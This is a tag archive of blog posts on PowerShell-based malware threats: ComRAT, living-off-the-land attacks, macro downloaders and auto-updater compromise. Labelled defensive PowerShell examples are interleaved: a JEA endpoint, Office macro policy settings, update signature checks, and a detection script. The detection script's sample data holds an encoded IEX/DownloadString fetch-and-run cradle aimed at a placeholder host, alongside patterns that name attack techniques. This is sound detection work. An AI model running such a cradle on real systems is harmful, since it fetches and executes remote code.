Tag Archives: PowerShell

ComRAT V4 got an upgrade: On the value of Threat Intelligence

30 May 2020

Popular IT security media and threat intelligence services reported this week that the ComRAT V4 malware used by Turla APT got an upgrade. (1)(2)(3)

The big question for all businesses is: Do we have an increased risk resulting from this upgrade? Are the existing security controls still mitigating the risk stemming from the ComRAT upgrade? Or do we have to upgrade our security controls as well?

Businesses targeted by the Turla APT should answer this question as soon as possible. Detailed information about the feature upgrade as well as about the existing security controls is required to answer it. This is nothing new. "If you know the enemy and know yourself, you need not fear the result of a hundred battles," says Sun Tzu in "The Art of War", written around 500 BC.

Are you prepared to answer this question? Your investment in threat intelligence is uneconomic if you cannot evaluate the threat details in the context of your environment.

What about ComRAT? The way command and control is performed has changed. But the primary installation method has not: "ComRAT is typically installed via PowerStallion, a lightweight PowerShell backdoor used by Turla to install other backdoors." (1)

PowerShell 5.0 Icon. Picture credits: see below.

So, if you have already implemented security controls that deal with malware which uses PowerShell, your risk will not change. Otherwise, the publication "Securing PowerShell in the Enterprise" (4) of the Australian Cyber Security Centre is a good starting point for a systematic approach to PowerShell security.

My advice: Disable PowerShell on all standard user computers. For administrative purposes, use hardened systems without email and internet access, and implement PowerShell endpoints.
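What a "PowerShell endpoint" looks like in practice, as an added example that is not part of the original post or of the ACSC publication: a constrained endpoint built with Just Enough Administration (JEA). Operators on the hardened admin workstation connect to a named endpoint that exposes only a handful of cmdlets, runs under a temporary virtual account and transcribes every session. The module name, the group name, the paths and the two service names allowed for Restart-Service are assumptions for illustration; the script is run elevated on the target server.

```powershell
# Added example (not from the original post or the ACSC publication): a JEA endpoint.
# Assumptions: module/endpoint name 'ServiceOps', operator group 'CORP\Service-Operators',
# transcript directory under C:\ProgramData\JEA. Run in an elevated session on the server.

$moduleName = 'ServiceOps'
$modulePath = Join-Path $env:ProgramFiles "WindowsPowerShell\Modules\$moduleName"
$rcPath     = Join-Path $modulePath 'RoleCapabilities'
$transcripts = 'C:\ProgramData\JEA\Transcripts'
New-Item -ItemType Directory -Path $rcPath, $transcripts -Force | Out-Null
New-ModuleManifest -Path (Join-Path $modulePath "$moduleName.psd1") `
    -Description 'JEA role capabilities for service operators'

# 1. Role capability: the allow-list of what a connected operator can see and run.
#    Restart-Service is further restricted to two service names via ValidateSet, so the
#    operator cannot restart, say, the EDR agent. Everything not listed does not exist
#    inside the session (no Invoke-Expression, no New-Object, no file system access).
New-PSRoleCapabilityFile -Path (Join-Path $rcPath "$moduleName.psrc") `
    -VisibleCmdlets @(
        'Get-Service',
        @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler', 'W32Time' } }
    ) `
    -VisibleFunctions 'Get-ServiceLog' `
    -FunctionDefinitions @{
        Name        = 'Get-ServiceLog'
        ScriptBlock = {
            param([string]$Service)
            Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager' } -MaxEvents 50 |
                Where-Object Message -like "*$Service*"
        }
    }

# 2. Session configuration: which group gets which role. RestrictedRemoteServer puts the
#    session into NoLanguage mode (no script blocks, no variables, no .NET calls);
#    RunAsVirtualAccount means no domain admin credentials ever land on this server;
#    the transcript directory records every command for incident response.
$psscPath = Join-Path $env:TEMP "$moduleName.pssc"
New-PSSessionConfigurationFile -Path $psscPath `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory $transcripts `
    -RoleDefinitions @{ 'CORP\Service-Operators' = @{ RoleCapabilities = $moduleName } }

if (-not (Test-PSSessionConfigurationFile -Path $psscPath)) {
    throw "Session configuration file $psscPath is invalid"
}
Register-PSSessionConfiguration -Name $moduleName -Path $psscPath -Force | Out-Null

# 3. From the hardened admin workstation (no email, no internet), the operator connects to
#    the endpoint by name; only the listed commands are available in that session:
#    Enter-PSSession -ComputerName srv01 -ConfigurationName ServiceOps
#    Get-Command                 # Get-Service, Restart-Service, Get-ServiceLog and a few built-ins
#    Restart-Service -Name Spooler
```

The endpoint is the admin side of the advice. Disabling PowerShell for standard users on the client side is normally done with an application-control rule (AppLocker or WDAC) for powershell.exe, powershell_ise.exe and pwsh.exe rather than by uninstalling the feature; the ACSC publication (4) describes the full set of controls, including constrained language mode and script block logging, which the endpoint above does not replace.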

Have a great Weekend.


References

  1. Lakshmanan R. New ComRAT Malware Uses Gmail to Receive Commands and Exfiltrate Data [Internet]. The Hacker News. 2020 [cited 2020 May 28]. Available from: https://thehackernews.com/2020/05/gmail-malware-hacker.html

  2. Robinson T. Turla’s ComRAT v4 uses Gmail web UI to receive commands, steal data [Internet]. SC Media. 2020 [cited 2020 May 30]. Available from: https://www.scmagazine.com/home/security-news/malware/turlas-comrat-v4-uses-gmail-web-ui-to-receive-commands-steal-data/

  3. Gatlan S. Russian cyberspies use Gmail to control updated ComRAT malware [Internet]. BleepingComputer. 2020 [cited 2020 May 30]. Available from: https://www.bleepingcomputer.com/news/security/russian-cyberspies-use-gmail-to-control-updated-comrat-malware/

  4. Australian Cyber Security Centre. Securing PowerShell in the Enterprise | Cyber.gov.au [Internet]. Australian Signals Directorate. 2019 [cited 2020 Mar 6]. Available from: https://www.cyber.gov.au/publications/securing-powershell-in-the-enterprise

Picture credits

  1. PowerShell 5.0 Icon. Microsoft / Public domain. https://commons.wikimedia.org/wiki/File:PowerShell_5.0_icon.png

Microsoft previews Microsoft Defender ATP for Linux – No reason to celebrate!

7 March 2020

At Ignite 2019 Microsoft announced that “Defender ATP is coming to Linux in 2020” (1). The preview version has been available since the end of February (2).

To be clear, I think Microsoft Defender ATP is a good product. It benefits from millions of sensors installed on consumer and company computers. And, with the entire Defender suite installed, companies can gain a good security level.

COVID-19 Virus ultrastructural morphology. Picture by CDC / Alissa Eckert, MS; Dan Higgins, MAMS

Just to recap why we need anti-malware products: We live in an operating system monoculture. Windows is everywhere: on the clients, on the servers, in the cloud. All Windows systems are networked for reasons of efficiency. The drawback of all monocultures is that they are vulnerable to diseases. COVID-19 is a current example in the real world; WannaCry and NotPetya are well-known examples in cyberspace.

Microsoft loves Linux, and starts implanting genes from the Windows DNA into the Linux DNA: the .NET Framework, PowerShell, Windows Defender ATP. Since the cost pressure in IT is high, companies will start using these products.

Good for the EBIT, bad for cyber security. PowerShell, for example, is often used in malware attacks (3). It is merely a matter of time before attackers start leveraging PowerShell on Linux. Living-off-the-land attacks will then work on Linux and Windows alike, in the worst case with no changes to the code. With that, Linux becomes vulnerable to attacks that so far were only known from Windows.

Operators of critical infrastructures in particular need a clear strategy for operating Microsoft products on Linux in order to keep the risk from this cross-over at an acceptable level.

For advice on securing PowerShell, see the publication “Securing PowerShell in the Enterprise” of the Australian Cyber Security Centre (4).

Have a great weekend!


References

  1. Tung L. Microsoft: Defender ATP is coming to Linux in 2020 [Internet]. ZDNet. 2019 [cited 2020 Mar 7]. Available from: https://www.zdnet.com/article/microsoft-defender-atp-is-coming-to-linux-in-2020/
  2. Vaughan-Nichols SJ. Microsoft previews Microsoft Defender ATP for Linux [Internet]. ZDNet. 2020 [cited 2020 Mar 7]. Available from: https://www.zdnet.com/article/microsoft-previews-microsoft-defender-atp-for-linux/
  3. Help Net Security. 91% of critical incidents involve known, legitimate binaries like PowerShell [Internet]. Help Net Security. 2018 [cited 2020 Mar 6]. Available from: https://www.helpnetsecurity.com/2018/06/28/incidents-legitimate-binaries/
  4. Australian Cyber Security Centre. Securing PowerShell in the Enterprise | Cyber.gov.au [Internet]. Australian Signals Directorate. 2019 [cited 2020 Mar 6]. Available from: https://www.cyber.gov.au/publications/securing-powershell-in-the-enterprise

IBM Webinar: Force the Bad Guys to Use Zero Day Exploits with Continuous Endpoint Enforcement and Patching

22 October 2016

On Tuesday, I watched the IBM webinar ‘Force the Bad Guys to Use Zero Day Exploits with Continuous Endpoint Enforcement and Patching’.

On slide 3 one could read the really interesting statement: ‘NSA: no zero days were used in any high profile breaches over last 24 months’.

Slide 3 – Force the Bad Guys to Use Zero Day Exploits — and Why That’s a Good Thing

Curtis Dukes, deputy national manager for national security systems at the NSA, said that the NSA has been involved in incident response or mitigation efforts for all ‘high profile incidents’ one has read about in the Washington Post or the New York Times.

In all these incidents the attackers used fairly simple techniques like spear phishing, watering hole attacks and USB-drive delivery to get onto the victims’ networks.

In the last 24 months, not one zero day has been used in these high profile intrusions.

That is a very interesting insight. Moreover, Curtis Dukes said that

The fundamental problem we faced in every one of those incidents was poor cyber hygiene.

The central idea of the webinar is to harden all systems by applying at least all existing patches for known vulnerabilities, and in a timely manner. For most organizations this is a great challenge: applying an endless stream of operating system and application patches to thousands of servers and endpoints is a never-ending nightmare. But it is essential in order to hinder an attacker who has managed to get onto the network in his lateral movement across the network.

If an attacker cannot exploit existing vulnerabilities, he is forced to install hacking tools from his C&C server. But this increases the likelihood of detection, because the attacker creates anomalies which can be detected, e.g., by a current anti-malware solution or a well-tuned SIEM system.

It is important to recognize that cyber hygiene must not be restricted to patching and password rules. Operating systems offer lots of powerful built-in tools, e.g. PowerShell, which an attacker can use to move laterally across the network. Such movements are much harder to detect, because they look very similar to standard user and administrator behavior. Pass-the-hash attacks are another example where patching is of limited value only.
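What "well-tuned SIEM" means for the PowerShell case, as an added example that is not part of the webinar or of the original post: a small set of detection rules run over process-creation records. The records below are constructed for illustration (their fields loosely follow Sysmon event ID 1 and Windows event 4688); host names, user names and the rule wording are assumptions. The point the paragraph makes is visible in the output: the plain backup script is not flagged, while the macro-launched encoded download cradle and the remoting commands are.

```powershell
# Added example, not from the webinar or the original post. Detection logic for PowerShell
# abuse over constructed process-creation records. Sample data, host/user names and rule
# wording are assumptions for illustration.

function Get-EncodedPayload {
    param([string]$CommandLine)
    # powershell.exe -EncodedCommand takes base64 of UTF-16LE text; it also accepts any
    # unambiguous prefix such as -e, -en or -enc. Returns the decoded text or $null.
    if ($CommandLine -match '\s-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    return $null
}

function Test-SuspiciousPowerShell {
    param([Parameter(Mandatory)][object[]]$Events)
    $psHosts       = 'powershell.exe', 'pwsh.exe', 'powershell_ise.exe', 'wsmprovhost.exe'
    $officeParents = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE'
    $cradle = 'DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\biex\b|Invoke-Expression|Start-BitsTransfer'

    foreach ($e in $Events) {
        $image  = [IO.Path]::GetFileName($e.Image)
        $parent = [IO.Path]::GetFileName($e.ParentImage)
        if ($image -notin $psHosts) { continue }
        $reasons = New-Object System.Collections.Generic.List[string]

        # Parent/child relationships: who started the PowerShell host matters as much as what it ran.
        if ($image -eq 'wsmprovhost.exe') { $reasons.Add('inbound PowerShell remoting session (WinRM host process)') }
        if ($parent -in $officeParents)   { $reasons.Add("launched by $parent (macro or DDE)") }
        if ($parent -in 'wmiprvse.exe', 'psexesvc.exe') { $reasons.Add("launched by $parent (remote execution via WMI/PsExec)") }

        # Command line: decode -EncodedCommand first, then inspect the plain and decoded text together.
        $text    = [string]$e.CommandLine
        $decoded = Get-EncodedPayload -CommandLine $text
        if ($decoded) { $reasons.Add('encoded command (decoded for inspection)'); $text = "$text $decoded" }
        if ($text -match '-w(?:indowstyle)?\s+hidden')       { $reasons.Add('hidden window') }
        if ($text -match '-(?:ep|executionpolicy)\s+bypass')  { $reasons.Add('execution policy bypass') }
        if ($text -match $cradle)                              { $reasons.Add('download cradle') }
        if ($text -match 'Invoke-Command|Enter-PSSession|New-PSSession|-ComputerName') {
            $reasons.Add('outbound remoting (possible lateral movement)')
        }

        if ($reasons.Count -gt 0) {
            $severity = if ($reasons.Count -ge 2 -or $parent -in $officeParents) { 'high' } else { 'medium' }
            [pscustomobject]@{
                Host        = $e.Host
                User        = $e.User
                Severity    = $severity
                Reasons     = $reasons -join '; '
                CommandLine = $e.CommandLine
            }
        }
    }
}

# Constructed sample: a benign admin task, a macro-launched encoded download cradle,
# an inbound remoting session and an outbound remoting command.
$cradleText = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/18293.ps1')"
$encoded    = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradleText))
$ps = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$sampleEvents = @(
    [pscustomobject]@{ Host='ws01';  User='CORP\alice';      ParentImage='C:\Windows\explorer.exe';          Image=$ps; CommandLine='powershell.exe -File C:\Scripts\backup.ps1' }
    [pscustomobject]@{ Host='ws01';  User='CORP\alice';      ParentImage='C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; Image=$ps; CommandLine="powershell.exe -NoP -W Hidden -Enc $encoded" }
    [pscustomobject]@{ Host='srv02'; User='CORP\svc-deploy'; ParentImage='C:\Windows\System32\svchost.exe';  Image='C:\Windows\System32\wsmprovhost.exe'; CommandLine='C:\Windows\system32\wsmprovhost.exe -Embedding' }
    [pscustomobject]@{ Host='ws01';  User='CORP\alice';      ParentImage='C:\Windows\System32\cmd.exe';      Image=$ps; CommandLine='powershell.exe -ep bypass -c Invoke-Command -ComputerName srv02 -ScriptBlock { whoami }' }
)
Test-SuspiciousPowerShell -Events $sampleEvents | Format-Table -AutoSize -Wrap
```

Two caveats a practitioner would add: the remoting rules produce findings for legitimate administration too, so the tuning work is in baselining which accounts and source hosts are expected to use remoting; and process command lines are only one signal, since script block logging (event 4104) shows what actually ran even when the command line was an innocuous-looking `-File`.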

It is very important to understand what threats a security solution mitigates. But it is of crucial importance to know the gaps and to have some ideas on how to deal with them effectively.

Have a good weekend.

AppGuard successfully protects against PowerShell based zero-day malware

9 July 2016

To get a feel for the impact AppGuard has on daily operations, I worked mainly on my test system in the past weeks. My test system is a six-year-old Dell Inspiron 1445 with 4 GB of RAM and a 240 GB SSD. The latest version of Windows 10 is deployed and all out-of-the-box Windows security options like Windows Defender and SmartScreen are activated.

I work with standard user rights; UAC is set to ‘Always notify me’. Macro protection for the Office suite is set to ‘Disable all macros with notification’. AppGuard is installed on top of this security stack to protect from all kinds of zero days.

The impact on my daily work is hardly noticeable. Standard malware is blocked either by Defender or by SmartScreen. Even the download of, e.g., JavaScript-based malware from malwr.com for test purposes is a challenging task.

AppGuard does a really good job in blocking the execution of all kinds of zero-day malware from user space. But how well does AppGuard work in the case of somewhat more advanced malware?

I searched for a new PowerShell based malware on malwr.com and found Invoice_201604469.doc.

A check on VirusTotal showed that only 3 of 56 anti-malware products identified the malware:

Antivirus    Result                     Update
Fortinet     WM/Poseket.A!tr.dldr       20160706
Qihoo-360    heur.macro.powershell.a    20160706
Symantec     W97M.Downloader            20160706

As always, the AutoOpen macro is password protected. But LibreOffice overrides the password protection and reveals a masterpiece of code:

AutoOpen macro with PowerShell code

I opened the document and followed the instructions to execute the AutoOpen macro.

Invoice_201604469.doc

The effect was enormous. AppGuard’s MemoryGuard blocked the execution of the PowerShell script and prevented the download of the payload 18293.exe:

Blocked Program Message 1

Blocked Program Message 2

Thus the command shell was not able to start the payload, and Windows displayed the last error message:

Windows Error Message

MemoryGuard is a really charming concept, and it is available out of the box after installation.

This concludes my tests. The experiments of the past weeks show that User Space and MemoryGuard are useful security features. They complement the Windows built-in security features and provide additional protection, in particular in the case of zero-day malware.

Have a good weekend.

Don’t ‘Enable Macro if you can’t read the entire document’!

9 April 2016

For some weeks now, so-called file-less malware has been experiencing a new boom. File-less malware has been used in cyber attacks for some years. What is new is that no executable is downloaded from a C&C server. Once the Trojan has become persistent, it downloads a PowerShell script from the C&C server and uses PowerShell to encrypt the victim’s files.

PowerShell gives the attacker access to the Windows cryptographic functions. In this case, the AES standard is used. For more details, please see the analysis on malwr.com.

Actually, this is nothing new. Even the delivery method, in this case a spear phishing attack with a Word document, is well known. And in case editing is deactivated for security reasons, the attacker provides concise instructions for activating it:

PowerWare ransomware instructions to disable macro security. Picture credits: Carbonblack.com
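The "Enable Content" click the lure asks for only exists if the Office macro policy allows it. As an added example that is not part of the original post or of the Carbon Black analysis, the script below audits that policy on a Windows client and can set the Group Policy registry values that remove the click altogether (disable macros except digitally signed ones, and block macros in files that carry the mark of the web). The Office version key 16.0 (Office 2016/2019/365) and the choice of applications are assumptions; older Office versions use 15.0 or 14.0.

```powershell
# Added example, not from the original post. Audit and (optionally) set the Office
# macro policy. Assumptions: Office registry version 16.0; Word, Excel and PowerPoint;
# the policy keys are the ones Group Policy writes under HKCU\Software\Policies.

$VbaWarningLabels = @{
    1 = 'Enable all macros (not recommended)'
    2 = 'Disable all macros with notification (user can click Enable Content)'
    3 = 'Disable all macros except digitally signed macros'
    4 = 'Disable all macros without notification'
}

function Read-RegValue {
    param([string]$Key, [string]$Name)
    # Returns the value or $null when the key or the value does not exist.
    if (Test-Path $Key) { (Get-ItemProperty -Path $Key -ErrorAction SilentlyContinue).$Name }
}

function Get-OfficeMacroPolicy {
    [CmdletBinding()]
    param(
        [string]$OfficeVersion = '16.0',
        [string[]]$Application = @('Word', 'Excel', 'PowerPoint')
    )
    foreach ($app in $Application) {
        $policyKey = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
        $userKey   = "HKCU:\Software\Microsoft\Office\$OfficeVersion\$app\Security"

        # A Group Policy value wins over the user's own Trust Center setting;
        # when neither exists Office behaves like VBAWarnings = 2.
        $vba = Read-RegValue $policyKey 'VBAWarnings'; $source = 'policy'
        if ($null -eq $vba) { $vba = Read-RegValue $userKey 'VBAWarnings'; $source = 'user' }
        if ($null -eq $vba) { $vba = 2; $source = 'default' }

        $motw = Read-RegValue $policyKey 'blockcontentexecutionfrominternet'
        if ($null -eq $motw) { $motw = Read-RegValue $userKey 'blockcontentexecutionfrominternet' }

        [pscustomobject]@{
            Application          = $app
            VBAWarnings          = [int]$vba
            Setting              = $VbaWarningLabels[[int]$vba]
            Source               = $source
            BlocksInternetMacros = ($motw -eq 1)
            UserCanEnableContent = ([int]$vba -le 2)   # the click the lure asks for
        }
    }
}

function Set-OfficeMacroPolicy {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [ValidateSet(2, 3, 4)][int]$VBAWarnings = 3,
        [string]$OfficeVersion = '16.0',
        [string[]]$Application = @('Word', 'Excel', 'PowerPoint')
    )
    foreach ($app in $Application) {
        $policyKey = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
        if ($PSCmdlet.ShouldProcess($policyKey, "VBAWarnings=$VBAWarnings, blockcontentexecutionfrominternet=1")) {
            New-Item -Path $policyKey -Force | Out-Null
            Set-ItemProperty -Path $policyKey -Name VBAWarnings -Value $VBAWarnings -Type DWord
            Set-ItemProperty -Path $policyKey -Name blockcontentexecutionfrominternet -Value 1 -Type DWord
        }
    }
}

Get-OfficeMacroPolicy | Format-Table -AutoSize
# Preview the change, then apply it:
# Set-OfficeMacroPolicy -VBAWarnings 3 -WhatIf
# Set-OfficeMacroPolicy -VBAWarnings 3
```

In a domain the values written by Set-OfficeMacroPolicy are overwritten at the next policy refresh, so the setting belongs in a Group Policy object (the same registry values are behind the "VBA Macro Notification Settings" and "Block macros from running in Office files from the Internet" policies); the local write is useful for standalone machines and for testing. Value 3 keeps signed in-house macros working while taking the Enable Content button away from the user the lure is written for.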

The great challenge is to keep user awareness high. Hopefully this will prevent users from going ahead as follows:

Have a good weekend.

The Good and the Evil of Auto-Updaters

7 March 2015

This week I had a lot of delightful discussions with software developers during some security assessments.

Software development in very dynamic sectors thrives on the rapid deployment of new functions and bug fixes. In large IT organizations in particular, the classic software rollout concept based on software packaging and distribution is often too slow to meet the needs of these users.

Often, developers try to solve this deployment challenge with auto-updaters. For the initial rollout, classic software packaging and distribution is used. Once a bug fix or new function has passed regression testing, a new version is built and pushed to the update server.

At every program start-up the auto-updater checks the update server. If a newer program version is available, the auto-updater installs it on the user’s computer and starts the new version.

This is a very charming concept. Users and developers love it because it is fast and reliable. And help desk staff love it because it ensures that all users work with the same version.

Unfortunately, auto-updaters are popular targets for attackers. For example, in the Home Depot data breach, which became public in November 2014, cyber criminals attacked the company’s software deployment system and deployed custom-built malware to point-of-sale devices.

It is very important that developers become aware of these attack vectors. Update servers, build servers and source control systems are very valuable targets for attackers. The mass rollout of malicious software is easy if an attacker gets access to a build or update server. And anti-malware or task virtualization software is largely useless, because the attack is initiated by the end user through a trusted channel.

Spring is near

In my opinion it is very important that organizations secure their software development infrastructure and development processes, accompanied by regular security awareness trainings for developers. If possible, enforce the separation-of-duties principle for all critical processes.

This is also true for the very popular PowerShell scripts which simplify the job of administrators. If an attacker injects some code into scripts which are used for the administration of a company’s servers … Don’t panic!
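One concrete defence for both cases above (the auto-updater fetching a new version, and the administrator running shared scripts), as an added example that is not part of the original post: verify every artifact before executing it, both against a pinned code-signing certificate and against a hash list that is itself a signed file. Get-AuthenticodeSignature and Get-FileHash are standard cmdlets; the certificate thumbprint, the package layout and the manifest file name are assumptions for illustration.

```powershell
# Added example, not from the original post. Assumptions: the publisher's code-signing
# certificate thumbprint is known to the client, the update package contains a signed
# manifest.psd1 listing SHA-256 hashes of the other files, and the file names are examples.

function Test-TrustedArtifact {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$ExpectedThumbprint,   # SHA-1 thumbprint of the expected signer (assumption)
        [string]$ExpectedSha256                               # optional, taken from a signed manifest
    )
    $sig = Get-AuthenticodeSignature -FilePath $Path
    $result = [ordered]@{ Path = $Path; Signature = $sig.Status; Signer = $null; HashOk = $null; Trusted = $false }
    if ($sig.SignerCertificate) { $result.Signer = $sig.SignerCertificate.Subject }

    # 'Valid' means the chain builds to a trusted root and the file was not changed after
    # signing. Pinning the thumbprint stops a validly signed file from a *different*
    # publisher (e.g. a leaked or look-alike certificate) from passing.
    $sigOk = ($sig.Status -eq 'Valid') -and ($sig.SignerCertificate.Thumbprint -eq $ExpectedThumbprint)

    if ($ExpectedSha256) {
        $actual = (Get-FileHash -Path $Path -Algorithm SHA256).Hash
        $result.HashOk = ($actual -eq $ExpectedSha256.ToUpperInvariant())
    }
    $result.Trusted = $sigOk -and ($result.HashOk -ne $false)
    [pscustomobject]$result
}

function Test-UpdatePackage {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$PackageDir,
        [Parameter(Mandatory)][string]$ExpectedThumbprint
    )
    # The manifest is a PowerShell data file, which Authenticode can sign, e.g.
    #   @{ Version = '2.3.1'; Files = @{ 'app.exe' = '<sha256>'; 'deploy.ps1' = '<sha256>' } }
    # Checking the manifest's own signature first means a tampered hash list fails here.
    $manifestPath = Join-Path $PackageDir 'manifest.psd1'
    $m = Test-TrustedArtifact -Path $manifestPath -ExpectedThumbprint $ExpectedThumbprint
    if (-not $m.Trusted) {
        return [pscustomobject]@{ Package = $PackageDir; Version = $null; Trusted = $false; Reason = "manifest: $($m.Signature)" }
    }
    $manifest = Import-PowerShellDataFile -Path $manifestPath

    $failures = foreach ($name in $manifest.Files.Keys) {
        $r = Test-TrustedArtifact -Path (Join-Path $PackageDir $name) `
                 -ExpectedThumbprint $ExpectedThumbprint -ExpectedSha256 $manifest.Files[$name]
        if (-not $r.Trusted) { "$name (signature=$($r.Signature), hashOk=$($r.HashOk))" }
    }
    [pscustomobject]@{
        Package = $PackageDir
        Version = $manifest.Version
        Trusted = (@($failures).Count -eq 0)
        Reason  = (@($failures) -join '; ')
    }
}

# Usage (paths and thumbprint are placeholders):
# Test-UpdatePackage -PackageDir 'C:\ProgramData\MyApp\updates\2.3.1' -ExpectedThumbprint '0123456789ABCDEF0123456789ABCDEF01234567'
# Test-TrustedArtifact -Path '\\fileserver\scripts\deploy.ps1' -ExpectedThumbprint '0123456789ABCDEF0123456789ABCDEF01234567'
```

The check is only as strong as the separation of duties around the signing key: if the key lives on the build server the attacker who owns the build server signs the malicious version and every check above passes. Keep signing off the build pipeline (a separate signing host or an HSM with a release approval step), and for administration scripts pair the check with an execution policy of AllSigned on the admin hosts so an edited script stops running instead of silently doing the attacker's work.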

That’s it for this week. Have a good weekend.